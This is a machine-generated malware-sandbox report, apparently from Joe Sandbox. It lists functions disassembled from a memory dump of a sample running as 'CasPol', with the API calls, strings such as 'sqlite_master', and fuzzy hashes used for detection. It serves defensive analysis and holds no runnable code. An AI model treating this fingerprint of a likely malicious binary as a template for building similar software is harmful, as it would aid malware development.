                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1549203181-0
                                                                                                                                                                                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                  Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3550944819-0
                                                                                                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                  Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$free
                                                                                                                                                                                  • String ID: g4@
                                                                                                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                  Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                                                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                  Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                  • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                  Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1127616056-0
                                                                                                                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                  Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                  • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: sqlite_master
                                                                                                                                                                                  • API String ID: 438689982-3163232059
                                                                                                                                                                                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                  Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3917621476-0
                                                                                                                                                                                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                  Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 822687973-0
                                                                                                                                                                                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                  Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                  Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2678498856-0
                                                                                                                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                  Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Item
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3888421826-0
                                                                                                                                                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                  Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3727323765-0
                                                                                                                                                                                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                  Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                  Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                  Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                  Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 764393265-0
                                                                                                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                  Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 979780441-0
                                                                                                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                  Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
